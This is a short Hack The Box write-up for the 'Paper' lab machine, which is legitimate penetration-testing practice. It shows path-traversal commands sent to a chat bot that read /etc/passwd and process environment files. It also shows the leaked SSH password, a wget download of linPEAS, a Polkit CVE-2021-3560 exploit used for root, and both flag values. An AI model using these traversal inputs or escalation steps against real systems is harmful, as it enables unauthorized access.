[Hack The Box] HTB—Paper

1. Information gathering

Let's begin by scanning

Useful information on ports 22, 80 and 443. The rest are filtered ports!

Let's check the hostname of the web server through the response header

    $ curl -I http://10.10.11.143

Let's map this hostname in the /etc/hosts file and try to access the web server

    # /etc/hosts
    10.10.11.143   office.paper

2. Website exploitation

Let's open the website now

The Penetration Testing Kit add-on provided more details on its tech stack and much more.

Well, a new host!

Let's add it too

    # /etc/hosts
    10.10.11.143   office.paper
    10.10.11.143   chat.office.paper

Let's access it now

Let's create an account and log in

    recyclops file ../../../../../etc/passwd

    recyclops file ../../../../../proc/self/environ

    dwight/Queenofblad3s!23

Let's use these creds to open an SSH session on the system

    ssh dwight@10.10.11.143

One, two, three: caught the user flag

user flag: 0edf5f0f21681b3ccefb4151bd9e1eb3

3. Privilege Escalation

Let's download and execute our favorite Linux privilege escalation tool

    wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64

Caught the Polkit CVE

CVE-2021-3560 PoC:
https://github.com/Almorabea/Polkit-exploit

Download and run the exploit on the machine

Got the root flag

root flag: f48bd0125f4411b932f0697bc8f4dff7
